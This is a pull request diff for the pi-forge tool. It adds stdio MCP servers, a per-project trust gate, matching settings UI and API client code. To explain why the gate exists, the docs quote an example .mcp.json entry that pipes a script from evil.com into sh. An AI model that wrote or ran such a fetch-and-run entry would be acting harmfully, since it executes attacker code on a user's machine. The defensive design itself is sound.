### PR TITLE
feat(mcp): stdio transport with per-project trust gate

### DIFF
--- a/docs/mcp.md
+++ b/docs/mcp.md
@@ -7,17 +7,27 @@ agent. Configure from **Settings → MCP** or by editing config files.
 > [`packages/server/src/mcp/`](../packages/server/src/mcp/) — see
 > `manager.ts` for the contract.
 
-## Scope
+## Server kinds
 
-- **Remote servers only.** Transports: `streamable-http` (current MCP
-  spec) and `sse` (legacy). The `auto` default tries StreamableHTTP
-  first and falls back to SSE — covers
-  [fastmcp](https://github.com/jlowin/fastmcp) servers regardless of
-  which transport they expose.
-- **stdio is not supported.** Run stdio MCP servers as a separate
-  process and expose them over HTTP/SSE.
-- **Static-header auth only** (Bearer tokens, custom headers). OAuth
-  per-server consent flows are not implemented.
+Two kinds, discriminated by which fields you populate (not by an
+explicit `kind` field — this matches the Claude Desktop /
+pi-mcp-adapter convention so existing `.mcp.json` files work
+unchanged):
+
+| Kind | Discriminator | Transport |
+|---|---|---|
+| **Remote** | `url` is set | `streamable-http` / `sse` (HTTP) |
+| **Stdio** | `command` is set | pi-forge spawns the subprocess; speaks MCP over its stdin/stdout |
+
+Exactly one of `url` / `command` must be set per server. The
+`auto` remote transport (default) tries StreamableHTTP first and
+falls back to SSE — covers
+[fastmcp](https://github.com/jlowin/fastmcp) servers regardless of
+which transport they expose.
+
+Static-header auth (Bearer tokens, custom headers) for remote
+servers; explicit env-passthrough for stdio. OAuth per-server
+consent flows are not implemented.
 
 ## Where servers live
 
@@ -40,12 +50,19 @@ to swap a global server for a project-specific one).
 {
   "disabled": false,
   "servers": {
-    "my-server": {
+    "weather": {
       "url": "https://mcp.example.com/sse",
       "transport": "auto",
       "enabled": true,
       "headers": {
         "Authorization": "Bearer sk-..."
+      }
+    },
+    "everything": {
+      "command": "npx",
+      "args": ["-y", "@modelcontextprotocol/server-everything"],
+      "env": {
+        "OPENAI_API_KEY": "sk-..."
       }
     }
   }
@@ -60,6 +77,10 @@ shape, so existing files don't need rewriting:
   "mcpServers": {
     "chrome-devtools": {
       "url": "https://mcp.example.com/sse"
+    },
+    "github": {
+      "command": "docker",
+      "args": ["run", "-i", "--rm", "ghcr.io/github/github-mcp-server"]
     }
   }
 }
@@ -67,13 +88,68 @@ shape, so existing files don't need rewriting:
 
 ### Field reference
 
-| Field | Type | Default | Notes |
-|---|---|---|---|
-| `url` | string | (required) | The MCP endpoint URL. |
-| `transport` | `"auto"` \| `"streamable-http"` \| `"sse"` | `"auto"` | Connection probe order. `auto` tries StreamableHTTP first. |
-| `enabled` | boolean | `true` | Disabled servers don't connect or contribute tools. |
-| `headers` | `Record<string, string>` | (none) | Forwarded on every MCP RPC. Treated as secret on read — `GET /mcp/servers` returns `***REDACTED***` for every value. |
-| `disabled` | boolean (top-level) | `false` | Master kill-switch. When `true`, NO MCP tools reach the agent regardless of per-server `enabled`. Surfaced as the toggle at the top of Settings → MCP. |
+| Field | Type | Kind | Default | Notes |
+|---|---|---|---|---|
+| `enabled` | boolean | both | `true` | Disabled servers don't connect or contribute tools. |
+| `url` | string | remote | — | The MCP endpoint URL. Required for remote servers. |
+| `transport` | `"auto"` \| `"streamable-http"` \| `"sse"` | remote | `"auto"` | Connection probe order. `auto` tries StreamableHTTP first. |
+| `headers` | `Record<string, string>` | remote | (none) | Forwarded on every MCP RPC. Treated as secret on read — `GET /mcp/servers` returns `***REDACTED***` for every value. |
+| `command` | string | stdio | — | Executable to spawn. Resolved via PATH if not absolute. Required for stdio servers. |
+| `args` | `string[]` | stdio | `[]` | CLI args appended to `command`. |
+| `env` | `Record<string, string>` | stdio | (none) | Subprocess env. Pi-forge env is **not** inherited by default (see "Stdio env" below). Treated as secret on read. |
+| `cwd` | string | stdio | project path (project scope) / pi-forge cwd (global) | Subprocess working directory. |
+| `disabled` | boolean (top-level) | — | `false` | Master kill-switch. When `true`, NO MCP tools reach the agent regardless of per-server `enabled`. |
+
+## Stdio env passthrough
+
+The MCP SDK's `StdioClientTransport` does **not** inherit the
+pi-forge process env by default — it uses `getDefaultEnvironment()`,
+a small allowlist (PATH, HOME, locale vars, terminal vars). This is
+safe-by-default: an `OPENAI_API_KEY` you set in your shell for
+pi-forge itself won't silently leak to every stdio MCP subprocess.
+
+pi-forge preserves that behavior: the subprocess sees
+`getDefaultEnvironment() ∪ cfg.env` (your explicit overrides win on
+collision). Pass through any credential the MCP server needs via the
+`env` field — e.g. `"GITHUB_TOKEN": "ghp_..."`.
+
+## Stdio trust gate (project-scope only)
+
+Project-scoped stdio entries are **gated behind an explicit per-
+project trust decision**. Until the operator grants trust via the
+UI, the entry sits in `trust_required` state — pi-forge does NOT
+spawn the subprocess and no tools surface. Global stdio entries
+(written to `${FORGE_DATA_DIR}/mcp.json` by the operator
+themselves) and remote project entries are never gated.
+
+**Why.** A hostile repo could ship `.mcp.json` with a stdio entry
+like `{ "command": "curl", "args": ["evil.com/x.sh", "|", "sh"] }`
+and silently launch a subprocess on next session-create. Remote
+entries have a smaller blast radius (they need a network endpoint
+to do anything); stdio is local code execution with whatever env
+you pass through.
+
+**Grant flow.** First time you open a project that contains stdio
+entries, Settings → MCP surfaces a banner:
+
+> This project wants to spawn N stdio MCP servers.
+
+Click **Trust this project**. Trust is recorded in
+`${FORGE_DATA_DIR}/mcp-stdio-trust.json` (per project, indefinite —
+no expiry). Subsequent loads bypass the gate. Adding NEW stdio
+entries to an already-trusted project does **not** re-prompt — the
+trust decision is scoped to "this project's `.mcp.json` is allowed
+to declare stdio servers"; the file's contents are part of the
+codebase you already trust. If you want per-entry confirmation,
+revoke trust first.
+
+**Revoke.** Settings → MCP, click **Revoke** on the trusted banner.
+This disconnects every project-scoped MCP server and clears the
+trust record. The next session-create will re-apply the gate to
+stdio entries.
+
+**Cascade.** Deleting the project removes its trust entry too
+(project-manager cleanup hook).
 
 ## How the agent sees the tools
 
@@ -101,10 +177,27 @@ keeps two servers' `search` tools from colliding.
   require restart or a Probe to pick up.
 - **Save.** `PUT` from Settings rewrites `mcp.json` atomically
   (`.tmp` + `rename`, mode 0600), then re-syncs the connection pool
-  (reconnects entries whose URL / transport / headers changed).
+  (reconnects entries whose connection-critical fields changed —
+  URL/transport/headers for remote, command/args/env/cwd for stdio).
+- **Trust grant.** Spawns every gated stdio entry in the project
+  immediately. Remote entries are unaffected.
+- **Trust revoke.** Tears down the entire project pool (including
+  remote entries — the next `ensureProjectLoaded` re-applies the
+  gate on stdio entries).
 - **Master toggle.** Flipping it off doesn't disconnect anything —
   future `createAgentSession` calls skip the `customTools` injection.
   Live sessions keep the tools they booted with.
+
+## Connection states
+
+| State | Meaning |
+|---|---|
+| `idle` | Configured but not yet connected (transient — connect attempt is in flight). |
+| `connecting` | Handshake in progress. |
+| `connected` | Tools listed and available to sessions. |
+| `error` | Connect failed (or the subprocess crashed). `lastError` carries the message. |
+| `disabled` | `enabled: false` — won't connect or contribute tools. |
+| `trust_required` | Project-scope stdio entry waiting for the operator to grant trust. |
 
 ## Header status badge
 
@@ -121,22 +214,39 @@ Hidden when no servers are configured and in `MINIMAL_UI` mode.
 ## Troubleshooting
 
 **Status stuck in `error`** — Settings → MCP, expand the row, read
-`lastError`. Common causes: wrong URL, missing `Authorization`
-header, server returning 4xx on `tools/list`. **Probe** forces a
-reconnect + tool re-list.
+`lastError`. Common causes:
+- **Remote:** wrong URL, missing `Authorization` header, server
+  returning 4xx on `tools/list`.
+- **Stdio:** command not found (resolve via absolute path or check
+  PATH passthrough), missing required env var, subprocess crashed at
+  startup (the child's stderr is inherited — check the pi-forge log).
 
-**Both transports fail** — pin `transport` explicitly. The `auto`
-probe round-trip wastes ~100 ms per reconnect when only one transport
-actually works.
+**Probe** forces a reconnect + tool re-list.
 
-**Headers show `***REDACTED***`** — read-path sentinel, not real
-data. The on-disk file still has the real value. On save, a sentinel
-value preserves the prior secret; a new value overwrites it (same
-pattern as `models.json`).
+**Stdio entry stuck in `trust_required`** — that's the per-project
+trust gate. Settings → MCP, click **Trust this project** on the
+amber banner. See "Stdio trust gate" above.
+
+**Both remote transports fail** — pin `transport` explicitly. The
+`auto` probe round-trip wastes ~100 ms per reconnect when only one
+transport actually works.
+
+**Headers / env show `***REDACTED***`** — read-path sentinel, not
+real data. The on-disk file still has the real value. On save, a
+sentinel value preserves the prior secret; a new value overwrites it
+(same pattern as `models.json`).
 
 **Tools don't appear after editing project `.mcp.json`** — the file
 is read once per project per server lifetime. Probe the row or
 restart pi-forge.
+
+**Stdio subprocess "ENOENT" / "command not found"** — the SDK's
+`StdioClientTransport` resolves `command` via the subprocess's PATH.
+PATH is included in the default-allowlist passthrough, so it's
+whatever PATH pi-forge itself sees. If you're running pi-forge from
+a desktop launcher / systemd, PATH may not include `~/.local/bin`,
+`nvm`, `pyenv`, etc. — use an absolute path in `command` or extend
+PATH via the `env` field.
 
 ## API surface
 
@@ -146,11 +256,13 @@ All routes under `/api/v1/mcp/`:
 |---|---|---|
 | `GET` | `/mcp/settings` | Master enable + connected/total count |
 | `PUT` | `/mcp/settings` | Toggle the master flag |
-| `GET` | `/mcp/servers[?projectId=…]` | Global config (redacted) + status |
-| `PUT` | `/mcp/servers/:name` | Upsert a global server |
+| `GET` | `/mcp/servers[?projectId=…]` | Global config (redacted) + status; `?projectId` adds `stdioTrust` |
+| `PUT` | `/mcp/servers/:name` | Upsert a global server (remote OR stdio — pick by `url` vs `command`) |
 | `DELETE` | `/mcp/servers/:name` | Remove a global server |
 | `POST` | `/mcp/servers/:name/probe[?projectId=…]` | Force reconnect + re-list |
 | `GET` | `/mcp/tools?projectId=…` | Flat tool list available to the project's sessions |
+| `POST` | `/mcp/trust/:projectId` | Grant project stdio trust (retries every gated entry) |
+| `DELETE` | `/mcp/trust/:projectId` | Revoke project stdio trust (unloads the project pool) |
 
 Request/response schemas in the Swagger UI at `/api/docs`.
 
@@ -159,3 +271,4 @@ Request/response schemas in the Swagger UI at `/api/docs`.
 - [`configuration.md`](./configuration.md) — env vars + per-project overrides
 - [`architecture.md`](./architecture.md) — where the MCP manager sits
 - [`packages/server/src/mcp/manager.ts`](../packages/server/src/mcp/manager.ts) — integration contract
+- [`packages/server/src/mcp/stdio-trust.ts`](../packages/server/src/mcp/stdio-trust.ts) — trust-gate rationale

--- a/packages/client/src/components/SettingsPanel.tsx
+++ b/packages/client/src/components/SettingsPanel.tsx
@@ -2338,11 +2338,27 @@ function BackupTab({ onError }: { onError: (msg: string | undefined) => void }) 
 
 interface McpDraft {
   name: string;
+  /** Discriminator. The form picks the field set based on this. */
+  kind: "remote" | "stdio";
+  enabled: boolean;
+  // Remote fields
   url: string;
   transport: McpTransport;
-  enabled: boolean;
   /** Headers as a flat ordered list so the user can manage rows. */
   headers: { key: string; value: string }[];
+  // Stdio fields
+  command: string;
+  /** Args as a single textarea-friendly string; one arg per line.
+   *  Parsed at save time. Stored as a string (not string[]) so the
+   *  user can type freely without each newline reshuffling the
+   *  controlled component. */
+  argsText: string;
+  /** Env as a flat ordered list; same shape + redaction handling as
+   *  headers, so the form reuses the same row UI. */
+  env: { key: string; value: string }[];
+  /** Optional cwd; blank ↦ default (project path for project
+   *  servers, pi-forge process cwd for global). */
+  cwd: string;
 }
 
 const SECRET_PLACEHOLDER = "***REDACTED***";
@@ -2350,11 +2366,26 @@ const SECRET_PLACEHOLDER = "***REDACTED***";
 function emptyDraft(): McpDraft {
   return {
     name: "",
+    kind: "remote",
+    enabled: true,
     url: "",
     transport: "auto",
-    enabled: true,
     headers: [],
+    command: "",
+    argsText: "",
+    env: [],
+    cwd: "",
   };
+}
+
+/** Split the textarea-style args field into the array shape the
+ *  server expects. Blank lines are dropped so a trailing newline
+ *  doesn't produce a ghost empty arg. */
+function parseArgs(text: string): string[] {
+  return text
+    .split("\n")
+    .map((s) => s.trim())
+    .filter((s) => s.length > 0);
 }
 
 function McpTab({ onError }: { onError: (msg: string | undefined) => void }) {
@@ -2372,11 +2403,14 @@ function McpTab({ onError }: { onError: (msg: string | undefined) => void }) {
   const status = useMcpStore(
     (s) => s.byProject[project?.id ?? "__no_project__"]?.status ?? EMPTY_STATUS,
   );
+  const stdioTrust = useMcpStore((s) => s.byProject[project?.id ?? "__no_project__"]?.stdioTrust);
   const refreshProject = useMcpStore((s) => s.refreshProject);
   const setMcpEnabled = useMcpStore((s) => s.setMcpEnabled);
   const upsertServer = useMcpStore((s) => s.upsertServer);
   const deleteServer = useMcpStore((s) => s.deleteServer);
   const probeServerStore = useMcpStore((s) => s.probeServer);
+  const grantStdioTrust = useMcpStore((s) => s.grantStdioTrust);
+  const revokeStdioTrust = useMcpStore((s) => s.revokeStdioTrust);
 
   const [draft, setDraft] = useState<McpDraft | undefined>(undefined);
   /** When set, draft applies to an existing server (PUT replaces). */
@@ -2463,12 +2497,18 @@ function McpTab({ onError }: { onError: (msg: string | undefined) => void }) {
     const cfg = servers[name];
     if (cfg === undefined) return;
     setEditingName(name);
+    const isStdio = typeof cfg.command === "string" && cfg.command.length > 0;
     setDraft({
       name,
-      url: cfg.url,
-      transport: cfg.transport ?? "auto",
+      kind: isStdio ? "stdio" : "remote",
       enabled: cfg.enabled !== false,
+      url: cfg.url ?? "",
+      transport: cfg.transport ?? "auto",
       headers: Object.entries(cfg.headers ?? {}).map(([k, v]) => ({ key: k, value: v })),
+      command: cfg.command ?? "",
+      argsText: (cfg.args ?? []).join("\n"),
+      env: Object.entries(cfg.env ?? {}).map(([k, v]) => ({ key: k, value: v })),
+      cwd: cfg.cwd ?? "",
     });
   };
 
@@ -2479,21 +2519,40 @@ function McpTab({ onError }: { onError: (msg: string | undefined) => void }) {
 
   const saveDraft = async (): Promise<void> => {
     if (draft === undefined) return;
-    if (draft.name.trim().length === 0 || draft.url.trim().length === 0) {
-      onError("Name and URL are required.");
+    if (draft.name.trim().length === 0) {
+      onError("Name is required.");
       return;
     }
-    const headers: Record<string, string> = {};
-    for (const h of draft.headers) {
-      if (h.key.trim().length === 0) continue;
-      headers[h.key] = h.value;
+    if (draft.kind === "remote" && draft.url.trim().length === 0) {
+      onError("URL is required for remote servers.");
+      return;
     }
-    const body: McpServerConfig = {
-      url: draft.url,
-      transport: draft.transport,
-      enabled: draft.enabled,
-    };
-    if (Object.keys(headers).length > 0) body.headers = headers;
+    if (draft.kind === "stdio" && draft.command.trim().length === 0) {
+      onError("Command is required for stdio servers.");
+      return;
+    }
+    const body: McpServerConfig = { enabled: draft.enabled };
+    if (draft.kind === "remote") {
+      body.url = draft.url;
+      body.transport = draft.transport;
+      const headers: Record<string, string> = {};
+      for (const h of draft.headers) {
+        if (h.key.trim().length === 0) continue;
+        headers[h.key] = h.value;
+      }
+      if (Object.keys(headers).length > 0) body.headers = headers;
+    } else {
+      body.command = draft.command;
+      const args = parseArgs(draft.argsText);
+      if (args.length > 0) body.args = args;
+      const env: Record<string, string> = {};
+      for (const e of draft.env) {
+        if (e.key.trim().length === 0) continue;
+        env[e.key] = e.value;
+      }
+      if (Object.keys(env).length > 0) body.env = env;
+      if (draft.cwd.trim().length > 0) body.cwd = draft.cwd;
+    }
     setBusy(true);
     try {
       await upsertServer(draft.name, body);
@@ -2612,6 +2671,46 @@ function McpTab({ onError }: { onError: (msg: string | undefined) => void }) {
           {enabled ? "Enabled" : "Disabled"}
         </button>
       </div>
+
+      {project !== undefined && (
+        <StdioTrustBanner
+          projectName={project.name}
+          trusted={stdioTrust?.trusted === true}
+          gatedCount={
+            status.filter((s) => s.scope === "project" && s.state === "trust_required").length
+          }
+          busy={busy}
+          onGrant={async () => {
+            setBusy(true);
+            try {
+              await grantStdioTrust(project.id);
+              onError(undefined);
+            } catch (err) {
+              onError(`Failed to grant trust: ${errorCode(err)}`);
+            } finally {
+              setBusy(false);
+            }
+          }}
+          onRevoke={async () => {
+            if (
+              !window.confirm(
+                `Revoke stdio MCP trust for "${project.name}"? This disconnects every running project-scoped MCP server.`,
+              )
+            ) {
+              return;
+            }
+            setBusy(true);
+            try {
+              await revokeStdioTrust(project.id);
+              onError(undefined);
+            } catch (err) {
+              onError(`Failed to revoke trust: ${errorCode(err)}`);
+            } finally {
+              setBusy(false);
+            }
+          }}
+        />
+      )}
 
       <McpServerList
         title="Global servers"
@@ -2841,11 +2940,23 @@ function McpServerList(props: {
                       )}
                     </div>
                   </div>
-                  <div className="mt-1 truncate text-[11px] text-neutral-500" title={s.url}>
-                    {s.url}
-                  </div>
+                  {s.kind === "stdio" ? (
+                    <div
+                      className="mt-1 truncate font-mono text-[11px] text-neutral-500"
+                      title={`${s.command ?? ""} ${(s.args ?? []).join(" ")}`.trim()}
+                    >
+                      {s.command} {(s.args ?? []).join(" ")}
+                    </div>
+                  ) : (
+                    <div className="mt-1 truncate text-[11px] text-neutral-500" title={s.url ?? ""}>
+                      {s.url}
+                    </div>
+                  )}
                   {s.lastError !== undefined && (
-                    <div className="mt-1 truncate text-[11px] text-red-300" title={s.lastError}>
+                    <div
+                      className="mt-1 truncate text-[11px] text-red-300 light:text-red-700"
+                      title={s.lastError}
+                    >
                       {s.lastError}
                     </div>
                   )}
@@ -2899,6 +3010,76 @@ function McpStateDot({ state }: { state: McpServerStatus["state"] }) {
   return <span className={`h-2 w-2 rounded-full ${cls}`} title={state} />;
 }
 
+/**
+ * Per-project stdio MCP trust prompt + status. Renders three states:
+ *
+ *  1. Untrusted + no gated entries → small dim "stdio MCP trust:
+ *     not granted" note. No CTA — there's nothing to spawn anyway.
+ *  2. Untrusted + ≥1 gated entry → prominent amber banner with
+ *     "Trust this project" CTA. This is the path most users will
+ *     hit after `git clone`'ing a project with a project-local
+ *     `.mcp.json` that declares stdio entries.
+ *  3. Trusted → small dim "trusted" note with a Revoke link.
+ *     Surfaces the decision so the user can undo it without
+ *     hunting through Settings.
+ */
+function StdioTrustBanner(props: {
+  projectName: string;
+  trusted: boolean;
+  gatedCount: number;
+  busy: boolean;
+  onGrant: () => void | Promise<void>;
+  onRevoke: () => void | Promise<void>;
+}) {
+  if (props.trusted) {
+    return (
+      <div className="flex items-center justify-between rounded border border-neutral-800 bg-neutral-900/40 px-3 py-1.5 text-[11px] text-neutral-500">
+        <span>
+          Stdio MCP trust granted for{" "}
+          <strong className="text-neutral-300">{props.projectName}</strong>. Project-local stdio MCP
+          servers from <code className="font-mono">.mcp.json</code> will spawn on session create.
+        </span>
+        <button
+          onClick={() => void props.onRevoke()}
+          disabled={props.busy}
+          className="rounded border border-neutral-700 px-2 py-0.5 text-[10px] text-neutral-400 hover:border-neutral-500 hover:text-neutral-200 disabled:opacity-50"
+          title="Disconnects every running project-scoped MCP server"
+        >
+          Revoke
+        </button>
+      </div>
+    );
+  }
+  if (props.gatedCount === 0) {
+    return null;
+  }
+  return (
+    <div className="rounded border border-amber-700/40 bg-amber-900/20 p-3 text-xs text-amber-200 light:border-amber-300 light:bg-amber-50 light:text-amber-800">
+      <div className="mb-2 font-medium">
+        This project wants to spawn {props.gatedCount} stdio MCP server
+        {props.gatedCount === 1 ? "" : "s"}.
+      </div>
+      <p className="text-[11px] leading-relaxed">
+        <strong>{props.projectName}</strong>'s <code className="font-mono">.mcp.json</code> declares
+        MCP server{props.gatedCount === 1 ? "" : "s"} that pi-forge would launch as local subprocess
+        {props.gatedCount === 1 ? "" : "es"}. Stdio MCP runs arbitrary commands on this machine with
+        whatever env you've passed through — only trust projects whose{" "}
+        <code className="font-mono">.mcp.json</code> you've reviewed and approve of. Remote (URL)
+        entries in this project are unaffected by this gate.
+      </p>
+      <div className="mt-2 flex gap-2">
+        <button
+          onClick={() => void props.onGrant()}
+          disabled={props.busy}
+          className="rounded bg-amber-200 px-3 py-1 text-[11px] font-medium text-amber-900 hover:bg-amber-100 disabled:opacity-50 light:bg-amber-600 light:text-amber-50 light:hover:bg-amber-700"
+        >
+          {props.busy ? "Granting…" : "Trust this project"}
+        </button>
+      </div>
+    </div>
+  );
+}
+
 function McpDraftForm(props: {
   draft: McpDraft;
   isEditing: boolean;
@@ -2916,6 +3097,43 @@ function McpDraftForm(props: {
       <h4 className="mb-2 text-xs font-semibold uppercase tracking-wider text-neutral-400">
         {props.isEditing ? `Edit '${draft.name}'` : "Add MCP server"}
       </h4>
+
+      {/* Kind selector — locked on edit to prevent silently moving a
+          remote server to stdio (which would drop its URL/headers on
+          save and re-spawn nothing useful). Delete + re-add to swap. */}
+      <div className="mb-3 flex items-center gap-3 rounded border border-neutral-800 bg-neutral-950 p-2 text-[11px]">
+        <span className="text-neutral-500">Type</span>
+        <label
+          className={`flex items-center gap-1.5 ${props.isEditing ? "cursor-not-allowed opacity-60" : "cursor-pointer"}`}
+        >
+          <input
+            type="radio"
+            name="mcp-kind"
+            checked={draft.kind === "remote"}
+            disabled={props.isEditing}
+            onChange={() => setField("kind", "remote")}
+          />
+          <span>Remote URL</span>
+        </label>
+        <label
+          className={`flex items-center gap-1.5 ${props.isEditing ? "cursor-not-allowed opacity-60" : "cursor-pointer"}`}
+        >
+          <input
+            type="radio"
+            name="mcp-kind"
+            checked={draft.kind === "stdio"}
+            disabled={props.isEditing}
+            onChange={() => setField("kind", "stdio")}
+          />
+          <span>Local subprocess (stdio)</span>
+        </label>
+        {props.isEditing && (
+          <span className="text-[10px] italic text-neutral-600">
+            Locked while editing — delete and re-add to change type.
+          </span>
+        )}
+      </div>
+
       <div className="grid grid-cols-[80px_1fr] items-center gap-2 text-xs">
         <label className="text-neutral-500">Name</label>
         <input
@@ -2925,23 +3143,55 @@ function McpDraftForm(props: {
           placeholder="my-server"
           className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-neutral-100 outline-none focus:border-neutral-500 disabled:opacity-50"
         />
-        <label className="text-neutral-500">URL</label>
-        <input
-          value={draft.url}
-          onChange={(e) => setField("url", e.target.value)}
-          placeholder="https://mcp.example.com/sse"
-          className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-neutral-100 outline-none focus:border-neutral-500"
-        />
-        <label className="text-neutral-500">Transport</label>
-        <select
-          value={draft.transport}
-          onChange={(e) => setField("transport", e.target.value as McpTransport)}
-          className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-neutral-100 outline-none focus:border-neutral-500"
-        >
-          <option value="auto">auto (StreamableHTTP, fall back to SSE)</option>
-          <option value="streamable-http">streamable-http</option>
-          <option value="sse">sse</option>
-        </select>
+
+        {draft.kind === "remote" ? (
+          <>
+            <label className="text-neutral-500">URL</label>
+            <input
+              value={draft.url}
+              onChange={(e) => setField("url", e.target.value)}
+              placeholder="https://mcp.example.com/sse"
+              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-neutral-100 outline-none focus:border-neutral-500"
+            />
+            <label className="text-neutral-500">Transport</label>
+            <select
+              value={draft.transport}
+              onChange={(e) => setField("transport", e.target.value as McpTransport)}
+              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-neutral-100 outline-none focus:border-neutral-500"
+            >
+              <option value="auto">auto (StreamableHTTP, fall back to SSE)</option>
+              <option value="streamable-http">streamable-http</option>
+              <option value="sse">sse</option>
+            </select>
+          </>
+        ) : (
+          <>
+            <label className="text-neutral-500">Command</label>
+            <input
+              value={draft.command}
+              onChange={(e) => setField("command", e.target.value)}
+              placeholder="npx (or absolute path to a binary)"
+              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 font-mono text-neutral-100 outline-none focus:border-neutral-500"
+            />
+            <label className="self-start pt-1 text-neutral-500">Args</label>
+            <textarea
+              value={draft.argsText}
+              onChange={(e) => setField("argsText", e.target.value)}
+              placeholder={"-y\n@modelcontextprotocol/server-everything"}
+              rows={3}
+              spellCheck={false}
+              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 font-mono text-[11px] text-neutral-100 outline-none focus:border-neutral-500"
+            />
+            <label className="text-neutral-500">cwd</label>
+            <input
+              value={draft.cwd}
+              onChange={(e) => setField("cwd", e.target.value)}
+              placeholder="(blank ↦ default: project path for project servers)"
+              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 font-mono text-neutral-100 outline-none focus:border-neutral-500"
+            />
+          </>
+        )}
+
         <label className="text-neutral-500">Enabled</label>
         <label className="flex items-center gap-2">
           <input
@@ -2954,66 +3204,27 @@ function McpDraftForm(props: {
           </span>
         </label>
       </div>
-      <div className="mt-3">
-        <div className="mb-1 flex items-center justify-between">
-          <h5 className="text-[11px] font-semibold uppercase tracking-wider text-neutral-500">
-            Headers
-          </h5>
-          <button
-            onClick={() => setField("headers", [...draft.headers, { key: "", value: "" }])}
-            className="rounded border border-neutral-700 px-2 py-0.5 text-[11px] text-neutral-300 hover:border-neutral-500"
-          >
-            + Header
-          </button>
-        </div>
-        {draft.headers.length === 0 && (
-          <p className="text-[11px] italic text-neutral-600">
-            No headers. Add `Authorization: Bearer …` here for auth.
-          </p>
-        )}
-        {draft.headers.map((h, i) => (
-          <div key={i} className="mb-1 grid grid-cols-[1fr_2fr_auto] gap-1">
-            <input
-              value={h.key}
-              onChange={(e) => {
-                const next = [...draft.headers];
-                next[i] = { ...h, key: e.target.value };
-                setField("headers", next);
-              }}
-              placeholder="Authorization"
-              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-[11px] font-mono text-neutral-100 outline-none focus:border-neutral-500"
-            />
-            <input
-              value={h.value === SECRET_PLACEHOLDER ? "" : h.value}
-              onChange={(e) => {
-                const next = [...draft.headers];
-                next[i] = { ...h, value: e.target.value };
-                setField("headers", next);
-              }}
-              placeholder={
-                h.value === SECRET_PLACEHOLDER ? "leave blank to keep stored value" : "Bearer …"
-              }
-              type="password"
-              className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-[11px] font-mono text-neutral-100 outline-none focus:border-neutral-500"
-            />
-            <button
-              onClick={() => {
-                const next = draft.headers.filter((_, j) => j !== i);
-                setField("headers", next);
-              }}
-              className="rounded border border-neutral-700 px-2 text-[11px] text-neutral-400 hover:text-red-300"
-              title="Remove header"
-            >
-              ×
-            </button>
-          </div>
-        ))}
-        {draft.headers.some((h) => h.value === SECRET_PLACEHOLDER) && (
-          <p className="mt-1 text-[10px] italic text-neutral-500">
-            Headers with the redaction sentinel keep their stored value when you save.
-          </p>
-        )}
-      </div>
+
+      {draft.kind === "remote" ? (
+        <SecretRowsEditor
+          label="Headers"
+          emptyHint="No headers. Add `Authorization: Bearer …` here for auth."
+          keyPlaceholder="Authorization"
+          valuePlaceholder="Bearer …"
+          rows={draft.headers}
+          onChange={(next) => setField("headers", next)}
+        />
+      ) : (
+        <SecretRowsEditor
+          label="Env"
+          emptyHint="No env. Add API keys / config your subprocess needs (PATH / HOME / locale are inherited automatically)."
+          keyPlaceholder="GITHUB_TOKEN"
+          valuePlaceholder="ghp_…"
+          rows={draft.env}
+          onChange={(next) => setField("env", next)}
+        />
+      )}
+
       <div className="mt-3 flex justify-end gap-2">
         <button
           onClick={props.onCancel}
@@ -3029,6 +3240,83 @@ function McpDraftForm(props: {
           {busy ? "Saving…" : "Save"}
         </button>
       </div>
+    </div>
+  );
+}
+
+/**
+ * Shared key/value editor used by both the Headers (remote) and Env
+ * (stdio) sections. Same visual + the same redaction-sentinel
+ * round-trip pattern — the value field renders blank when the
+ * stored value is the sentinel so the user types a replacement
+ * instead of "editing" the placeholder.
+ */
+function SecretRowsEditor(props: {
+  label: string;
+  emptyHint: string;
+  keyPlaceholder: string;
+  valuePlaceholder: string;
+  rows: { key: string; value: string }[];
+  onChange: (next: { key: string; value: string }[]) => void;
+}) {
+  const { rows } = props;
+  return (
+    <div className="mt-3">
+      <div className="mb-1 flex items-center justify-between">
+        <h5 className="text-[11px] font-semibold uppercase tracking-wider text-neutral-500">
+          {props.label}
+        </h5>
+        <button
+          onClick={() => props.onChange([...rows, { key: "", value: "" }])}
+          className="rounded border border-neutral-700 px-2 py-0.5 text-[11px] text-neutral-300 hover:border-neutral-500"
+        >
+          + {props.label.replace(/s$/, "")}
+        </button>
+      </div>
+      {rows.length === 0 && (
+        <p className="text-[11px] italic text-neutral-600">{props.emptyHint}</p>
+      )}
+      {rows.map((r, i) => (
+        <div key={i} className="mb-1 grid grid-cols-[1fr_2fr_auto] gap-1">
+          <input
+            value={r.key}
+            onChange={(e) => {
+              const next = [...rows];
+              next[i] = { ...r, key: e.target.value };
+              props.onChange(next);
+            }}
+            placeholder={props.keyPlaceholder}
+            className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-[11px] font-mono text-neutral-100 outline-none focus:border-neutral-500"
+          />
+          <input
+            value={r.value === SECRET_PLACEHOLDER ? "" : r.value}
+            onChange={(e) => {
+              const next = [...rows];
+              next[i] = { ...r, value: e.target.value };
+              props.onChange(next);
+            }}
+            placeholder={
+              r.value === SECRET_PLACEHOLDER
+                ? "leave blank to keep stored value"
+                : props.valuePlaceholder
+            }
+            type="password"
+            className="rounded border border-neutral-700 bg-neutral-950 px-2 py-1 text-[11px] font-mono text-neutral-100 outline-none focus:border-neutral-500"
+          />
+          <button
+            onClick={() => props.onChange(rows.filter((_, j) => j !== i))}
+            className="rounded border border-neutral-700 px-2 text-[11px] text-neutral-400 hover:text-red-300 light:hover:text-red-700"
+            title={`Remove ${props.label.toLowerCase()}`}
+          >
+            ×
+          </button>
+        </div>
+      ))}
+      {rows.some((r) => r.value === SECRET_PLACEHOLDER) && (
+        <p className="mt-1 text-[10px] italic text-neutral-500">
+          Values with the redaction sentinel keep their stored value when you save.
+        </p>
+      )}
     </div>
   );
 }

--- a/packages/client/src/lib/api-client/index.ts
+++ b/packages/client/src/lib/api-client/index.ts
@@ -1393,6 +1393,31 @@ export const api = {
   },
   listMcpTools: (projectId: string) =>
     request(`/api/v1/mcp/tools?projectId=${encodeURIComponent(projectId)}`, vMcpTools),
+  /** Grant this project permission to declare stdio MCP servers in
+   *  its `.mcp.json`. Spawns every currently-gated entry. */
